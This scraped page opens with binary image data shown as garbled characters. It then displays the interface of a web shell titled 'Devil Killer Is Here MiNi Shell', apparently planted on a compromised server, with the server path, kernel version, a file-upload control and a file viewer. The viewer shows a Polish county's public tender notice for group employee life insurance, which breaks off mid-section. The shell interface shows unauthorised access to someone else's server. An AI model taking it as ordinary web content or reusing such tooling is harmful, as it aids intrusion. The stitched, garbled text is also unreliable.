JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250924/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250924/0044048501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ubezpieczenie grupowe na życie pracowników, współmałżonków oraz pełnoletnich dzieci pracowników jednostek organizacyjnych Powiatu Mińskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Miński</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711581788</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">T. Kościuszki 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mińsk Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiatminski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatminski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Attis Broker Sp. z o.o.</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">017260707</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Klimczaka 1</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">02-797</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">+ 48 22 223 68 68</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">broker@attis.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://attisbroker.pl/pl/main</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ubezpieczenie grupowe na życie pracowników, współmałżonków oraz pełnoletnich dzieci pracowników jednostek organizacyjnych Powiatu Mińskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0777511a-ab9d-4c97-94e3-9bcf20e08c9e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00440485</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/attis_broker <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/attis_broker</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Z zastrzeżeniem art. 61 ust. 2 ustawy, komunikacja między zamawiającym a wykonawcami (w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń) odbywa się przy użyciu Platformy Zakupowej, zwanej dalej „Platformą”. <br/><br/>Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie, tj.: <br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; <br/>b)	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje; <br/>c)	zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer, <br/>d)	włączona obsługa JavaScript; <br/>e)	zainstalowany program Adobe Acrobat Reader, lub inny obsługujący format plików .pdf; <br/>f)	szyfrowanie na Platformie odbywa się za pomocą protokołu TLS 1.3.; <br/>g)	oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera zsynchronizowanego z zegarem Głównego Urzędu Miar.<br/><br/>Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, pobrania dokumentacji, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej https://platformazakupowa.pl/strona/45-instrukcje<br/><br/>Pozostałe wymagania, zgodnie z postanowieniami ROZDZIAŁU II SWZ - Informacje o środkach komunikacji elektronicznej. Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej.<br/><br/>Z uwagi na limit znaków szczegółowe informacje zawarte są w Rozdziale II SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO zgodnie z SWZ - Rozdział IV, ust. 4-5. Załącznik nr 4 do SWZ - postanowienia § 11. <br/>Załącznik nr 2 do SWZ - Oświadczenie Wykonawcy zawarte w pkt. 9.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna RODO zgodnie z SWZ - Rozdział IV, ust. 4-5. Załącznik nr 4 do SWZ - postanowienia § 11. <br/>Załącznik nr 2 do SWZ - Oświadczenie Wykonawcy zawarte w pkt. 9.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1/09/2025/GUŻ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa ubezpieczenia grupowego na życie pracowników, współmałżonków oraz pełnoletnich dzieci pracowników jednostek organizacyjnych Powiatu Mińskiego.<br/>Zakres zamówienia obejmuje następujące zdarzenia: <br/>Zgon ubezpieczonego<br/>Choroba śmiertelna<br/>Zgon ubezpieczonego w wyniku nieszczęśliwego wypadku<br/>Zgon ubezpieczonego w wyniku wypadku przy pracy<br/>Zgon ubezpieczonego w wyniku wypadku komunikacyjnego<br/>Zgon ubezpieczonego w wyniku wypadku komunikacyjnego przy pracy<br/>Zgon ubezpieczonego w wyniku zawału serca lub udaru mózgu<br/>Osierocenie dziecka przez ubezpieczonego<br/>Trwały uszczerbek na zdrowiu ubezpieczonego spowodowany nieszczęśliwym wypadkiem (świadczenie za 100% uszczerbku)<br/>Trwały uszczerbek na zdrowiu ubezpieczonego spowodowany zawałem serca lub udarem mózgu (świadczenie za 100% uszczerbku)<br/>Poważne zachorowania ubezpieczonego<br/>Operacje Chirurgiczne (wypłata w zależności od klasy operacji – maksymalna wartość wypłaty równa sumie ubezpieczenia podanej w niniejszej tabeli)<br/>Trwała niezdolność do pracy cały okres ochrony <br/>Świadczenie apteczne<br/>Leczenie specjalistyczne ubezpieczonego<br/>Zgon małżonka ubezpieczonego<br/>Zgon małżonka ubezpieczonego w wyniku nieszczęśliwego wypadku<br/>Zgon dziecka ubezpieczonego<br/>Zgon dziecka ubezpieczonego wskutek nieszczęśliwego wypadku<br/>Zgon rodzica ubezpieczonego oraz rodzica małżonka ubezpieczonego<br/>Zgon rodzica ubezpieczonego oraz rodzica małżonka ubezpieczonego wskutek nieszczęśliwego wypadku<br/>Urodzenie dziecka<br/>Urodzenie martwego dziecka ubezpieczonego<br/>Świadczenia szpitalne: <br/>- Za każdy dzień pobytu w szpitalu spowodowany chorobą<br/>- Za każdy dzień pobytu w szpitalu spowodowany nieszczęśliwym wypadkiem (min. przez pierwsze 14 dni)<br/>- Za każdy dzień pobytu w szpitalu spowodowany zawałem serca lub udarem mózgu (min. przez pierwsze 14 dni)<br/>- Za każdy dzień pobytu w szpitalu spowodowany nieszczęśliwym wypadkiem komunikacyjnym (min. przez pierwsze 14 dni)<br/>- Za każdy dzień pobytu w szpitalu spowodowany nieszczęśliwym wypadkiem przy pracy (min. przez pierwsze 14 dni)<br/>- Za każdy dzień pobytu w szpitalu spowodowany nieszczęśliwym wypadkiem komunikacyjnym przy pracy (min. przez pierwsze 14 dni)<br/>- Za każdy dzień pobytu w szpitalu powyżej 14 dnia spowodowany nieszczęśliwym wypadkiem, wypadkiem przy pracy, wypadkiem komunikacyjnym lub wypadkiem komunikacyjnym przy pracy<br/>- Za każdy dzień pobytu w szpitalu powyżej 14 dnia spowodowany zawałem serca lub udarem mózgu<br/>- Leczenie ubezpieczonego w szpitalu na OIOM – świadczenie jednorazowe lub w podziale na dni <br/>Rekonwalescencja po min. 14 dniowym pobycie w szpitalu – świadczenie za dzień lub jednorazowe<br/>Prawo do indywidualnej kontynuacji ubezpieczenia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66511000-5 - Usługi ubezpieczeń na życie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo opcji, o którym mowa w art. 441 Ustawy, polegające na możliwości rozszerzenia zakresu Umowy o włączenie dodatkowych osób przystępujących do ubezpieczenia ponad limit wskazany w § 3 ust. 5 Umowy. Skorzystanie z prawa opcji może nastąpić w sytuacji, gdy w trakcie realizacji Umowy wzrośnie liczba pracowników Zamawiającego zainteresowanych skorzystaniem z ochrony ubezpieczeniowej regulowanej przedmiotową Umową.<br/>Przedmiot Umowy objęty opcją będzie tożsamy z przedmiotem Umowy pod względem rodzaju oraz warunków świadczenia usług ubezpieczeniowych.<br/>W ramach prawa opcji, Zamawiający może zlecić Wykonawcy objęcie ochroną ubezpieczeniową dodatkowo maksymalnie 100 (słownie: sto) osób przystępujących do ubezpieczenia w okresie obowiązywania Umowy.<br/>Skorzystanie z prawa opcji następuje poprzez złożenie Wykonawcy przez Zamawiającego oświadczenia woli w formie pisemnej lub elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym, wskazującego liczbę i dane identyfikujące osoby objęte zakresem opcji.<br/>Wykonawca zobowiązuje się do realizacji zamówienia objętego opcją na warunkach określonych w Umowie, na podstawie stawek jednostkowych, określonych w postanowieniach § 7 ust. 2 Umowy, w zakresie ochrony ubezpieczeniowej zgodnej z zakresem określonym dla zamówienia podstawowego.<br/>Z tytułu niewykorzystania przez Zamawiającego prawa opcji Wykonawcy nie przysługują żadne roszczenia, w szczególności roszczenia o zapłatę wynagrodzenia lub odszkodowania.<br/>Realizacja prawa opcji nie wymaga zawarcia aneksu do Umowy, lecz następuje poprzez wystosowanie przez Zamawiającego oświadczenia, o którym mowa w ust. 5, oraz jego akceptację przez Wykonawcę w formie potwierdzenia przyjęcia zgłoszenia do realizacji. <br/>Łączna wartość opcji nie przekroczy kwoty 293.400,00 PLN. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-11-01 do 2028-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień podobnych, o których mowa w art. 214 ust. 1 pkt 7 ustawy, polegających na powtórzeniu podobnych usług, zgodnych z przedmiotem zamówienia podstawowego, o wartości do 10 % wartości zamówienia podstawowego. Podstawą ustalenia warunków realizacji zamówienia podobnego są przeprowadzone z wykonawcą negocjacje.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia może się ubiegać wykonawca, który spełnia poniżej określony warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający uzna, że wykonawca posiada wymagane przepisami prawa uprawnienia do prowadzenia działalności zawodowej, jeżeli wykonawca wykaże, że posiada wymagane zezwolenie na prowadzenie działalności ubezpieczeniowej wydane przez organ nadzoru, zgodnie z ustawą z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (t.j. Dz. U. z. 2024 r. poz. 838) w zakresie zgodnym z przedmiotem zamówienia. <br/>Uwaga: <br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek muszą spełniać wszyscy wykonawcy składający ofertę wspólną, którzy w ramach realizacji zamówienia wykonywać będą czynności ubezpieczeniowe w rozumieniu ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (t.j. Dz.U. 2024 poz. 838). <br/>2.	O udzielenie zamówienia może się ubiegać wykonawca, w stosunku, do którego nie zachodzą podstawy wykluczenia z postępowania w sytuacjach określonych w załączniku nr 7 do SWZ (tj. wykaz podstaw wykluczenia). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia wskazujące, które usługi wykonają poszczególni wykonawcy, według wzoru stanowiącego załącznik nr 2 do SWZ. <br/>Uwaga! Ww. dokument należy złożyć tylko w przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia wskazujące, które usługi wykonają poszczególni wykonawcy, według wzoru stanowiącego załącznik nr 2 do SWZ. <br/>Uwaga! Ww. dokument należy złożyć tylko w przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Ogólne Warunki Ubezpieczenia Wykonawcy, potwierdzające spełnienie wymagań zamawiającego w zakresie oferowanego ubezpieczenia określonego w Opisie Przedmiotu Zamówienia SWZ. <br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia wykonawcy ci składają wspólnie ww. dokumenty. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Ogólne Warunki Ubezpieczenia Wykonawcy, potwierdzające spełnienie wymagań zamawiającego w zakresie oferowanego ubezpieczenia określonego w Opisie Przedmiotu Zamówienia SWZ. <br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia wykonawcy ci składają wspólnie ww. dokumenty. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	formularz oferty, według wzoru stanowiącego załącznik nr 2 do SWZ; <br/>2)	odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru; <br/>3)	pełnomocnictwa lub inne dokumenty potwierdzające umocowanie do reprezentowania; <br/>4)	oświadczenie o niepodleganiu wykluczeniu, według wzoru stanowiącego załącznik nr 5 do SWZ; <br/>5)	oświadczenie o spełnianiu warunków udziału w postępowaniu, według wzoru stanowiącego załącznik nr 6 do SWZ; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy. <br/>2.	Pełnomocnictwo, o którym mowa w pkt 1 należy dołączyć do oferty. <br/>3.	Wszelką korespondencję w postępowaniu zamawiający kieruje do pełnomocnika. <br/>4.	Wspólnicy spółki cywilnej są wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia i mają do nich zastosowanie zasady określone w pkt 1 – 3. <br/>5.	Przed zawarciem umowy wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić zamawiającemu kopię umowy regulującej współpracę tych wykonawców, zawierającą, co najmniej: <br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia, <br/>2)	określenie zakresu działania poszczególnych stron umowy, <br/>3)	czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony dopuszczają wprowadzanie zmian do Umowy, które nie noszą znamion zmian istotnych 